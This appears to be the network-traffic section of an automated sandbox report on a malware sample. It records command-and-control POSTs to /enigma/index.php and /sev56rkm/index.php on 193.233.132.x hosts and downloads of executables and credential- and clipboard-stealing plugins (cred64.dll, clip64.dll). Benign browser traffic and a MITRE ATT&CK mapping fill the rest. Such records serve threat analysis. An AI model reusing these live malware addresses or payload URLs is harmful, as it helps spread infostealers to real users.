rundll32.exe

Remote address:

193.233.132.167:80

Request

POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 5
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

249.197.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

249.197.17.2.in-addr.arpa

IN PTR

Response

249.197.17.2.in-addr.arpa

IN PTR

a2-17-197-249deploystaticakamaitechnologiescom
DNS

beacons.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

192.178.49.163
POST

https://beacons.gcp.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

192.178.49.163:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 300
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
OPTIONS

https://beacons.gcp.gvt2.com/domainreliability/upload-nel

chrome.exe

Remote address:

192.178.49.163:443

Request

OPTIONS /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
origin: https://accounts.google.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
POST

https://beacons.gcp.gvt2.com/domainreliability/upload-nel

chrome.exe

Remote address:

192.178.49.163:443

Request

POST /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 405
content-type: application/reports+json
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

163.49.178.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.49.178.192.in-addr.arpa

IN PTR

Response

163.49.178.192.in-addr.arpa

IN PTR

phx19s05-in-f31e100net
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response

204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

tls, http2

2.5kB
9.0kB
20
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

HTTP Response

204
23.62.61.194:443

https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893

tls, http2

1.5kB
5.4kB
17
12

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893

HTTP Response

200
193.233.132.139:80

http://193.233.132.139/sev56rkm/index.php

http

explorta.exe

1.9kB
2.1kB
16
13

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.139/sev56rkm/index.php

HTTP Response

200
193.233.132.167:80

http://193.233.132.167/cost/random.exe

http

explorta.exe

274.8kB
8.1MB
5794
5793

HTTP Request

GET http://193.233.132.167/cost/sarra.exe

HTTP Response

200

HTTP Request

GET http://193.233.132.167/mine/amert.exe

HTTP Response

200

HTTP Request

GET http://193.233.132.167/mine/random.exe

HTTP Response

200

HTTP Request

GET http://193.233.132.167/cost/random.exe

HTTP Response

200
142.250.179.238:443

www.youtube.com

tls, http2

chrome.exe

1.0kB
8.4kB
10
10
142.250.179.238:443

https://www.youtube.com/account

tls, http2

chrome.exe

2.2kB
10.7kB
17
20

HTTP Request

GET https://www.youtube.com/account
172.217.16.234:443

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto

tls, http2

chrome.exe

1.9kB
7.0kB
16
17

HTTP Request

GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
172.217.16.238:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1

tls, http2

chrome.exe

3.2kB
25.8kB
25
34

HTTP Request

GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1
142.250.178.4:443

www.google.com

tls

chrome.exe

953 B
4.8kB
8
9
142.250.187.206:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

chrome.exe

1.7kB
8.5kB
14
15

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
193.233.132.167:80

http://193.233.132.167/enigma/Plugins/clip64.dll

http

chrosha.exe

49.5kB
1.4MB
1042
1041

HTTP Request

POST http://193.233.132.167/enigma/index.php

HTTP Response

200

HTTP Request

POST http://193.233.132.167/enigma/index.php

HTTP Response

200

HTTP Request

GET http://193.233.132.167/enigma/Plugins/cred64.dll

HTTP Response

200

HTTP Request

GET http://193.233.132.167/enigma/Plugins/clip64.dll

HTTP Response

200
193.233.132.167:80

http://193.233.132.167/enigma/index.php

http

rundll32.exe

403 B
351 B
5
3

HTTP Request

POST http://193.233.132.167/enigma/index.php

HTTP Response

200
193.233.132.167:80

http://193.233.132.167/enigma/index.php

http

rundll32.exe

386 B
891 B
5
4

HTTP Request

POST http://193.233.132.167/enigma/index.php

HTTP Response

200
192.178.49.163:443

https://beacons.gcp.gvt2.com/domainreliability/upload-nel

tls, http2

chrome.exe

3.4kB
8.0kB
27
28

HTTP Request

POST https://beacons.gcp.gvt2.com/domainreliability/upload

HTTP Request

OPTIONS https://beacons.gcp.gvt2.com/domainreliability/upload-nel

HTTP Request

POST https://beacons.gcp.gvt2.com/domainreliability/upload-nel

HTTP Response

200

HTTP Response

200
173.194.69.84:443

accounts.google.com

tls, http2

chrome.exe

953 B
5.8kB
8
8
172.217.16.238:443

clients2.google.com

tls, http2

chrome.exe

999 B
8.4kB
9
10

8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

73.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

73.159.190.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

194.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

194.61.62.23.in-addr.arpa
8.8.8.8:53

139.132.233.193.in-addr.arpa

dns

74 B
129 B
1
1

DNS Request

139.132.233.193.in-addr.arpa
8.8.8.8:53

167.132.233.193.in-addr.arpa

dns

74 B
129 B
1
1

DNS Request

167.132.233.193.in-addr.arpa
8.8.8.8:53

www.youtube.com

dns

chrome.exe

61 B
271 B
1
1

DNS Request

www.youtube.com

DNS Response

142.250.179.238

142.250.180.14

142.250.187.206

142.250.187.238

142.250.178.14

172.217.16.238

142.250.200.14

142.250.200.46

216.58.201.110

216.58.204.78

216.58.212.206
8.8.8.8:53

accounts.google.com

dns

chrome.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

173.194.69.84
8.8.8.8:53

195.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.187.250.142.in-addr.arpa
8.8.8.8:53

234.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

234.187.250.142.in-addr.arpa
8.8.8.8:53

238.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.179.250.142.in-addr.arpa
173.194.69.84:443

accounts.google.com

https

chrome.exe

10.3kB
127.7kB
80
131
8.8.8.8:53

content-autofill.googleapis.com

dns

chrome.exe

77 B
269 B
1
1

DNS Request

content-autofill.googleapis.com

DNS Response

172.217.16.234

142.250.200.10

142.250.200.42

216.58.201.106

216.58.204.74

216.58.212.202

172.217.169.74

142.250.179.234

142.250.180.10

142.250.187.202

142.250.187.234

142.250.178.10
8.8.8.8:53

accounts.youtube.com

dns

chrome.exe

66 B
110 B
1
1

DNS Request

accounts.youtube.com

DNS Response

172.217.16.238
8.8.8.8:53

84.69.194.173.in-addr.arpa

dns

72 B
105 B
1
1

DNS Request

84.69.194.173.in-addr.arpa
8.8.8.8:53

3.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.180.250.142.in-addr.arpa
8.8.8.8:53

227.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

227.212.58.216.in-addr.arpa
8.8.8.8:53

234.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

234.16.217.172.in-addr.arpa
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.178.4
142.250.178.4:443

www.google.com

https

chrome.exe

3.8kB
9.4kB
10
11
8.8.8.8:53

238.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

238.16.217.172.in-addr.arpa
8.8.8.8:53

4.178.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

4.178.250.142.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

172.217.16.238
172.217.16.238:443

clients2.google.com

https

chrome.exe

3.0kB
7.2kB
8
8
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

play.google.com

dns

chrome.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.187.206
142.250.187.206:443

play.google.com

https

chrome.exe

7.7kB
9.9kB
18
22
8.8.8.8:53

206.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.187.250.142.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

17.14.97.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

17.14.97.104.in-addr.arpa
8.8.8.8:53

249.197.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

249.197.17.2.in-addr.arpa
173.194.69.84:443

accounts.google.com

https

chrome.exe

3.0kB
3.8kB
8
10
8.8.8.8:53

beacons.gcp.gvt2.com

dns

chrome.exe

66 B
112 B
1
1

DNS Request

beacons.gcp.gvt2.com

DNS Response

192.178.49.163
173.194.69.84:443

accounts.google.com

https

chrome.exe

3.9kB
8.2kB
10
12
172.217.16.238:443

clients2.google.com

https

chrome.exe

3.3kB
9.1kB
9
11
8.8.8.8:53

163.49.178.192.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

163.49.178.192.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
192.178.49.163:443

beacons.gcp.gvt2.com

https

chrome.exe

3.3kB
7.7kB
9
10
173.194.69.84:443

accounts.google.com

https

chrome.exe

2.3kB
3.6kB
8
9

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion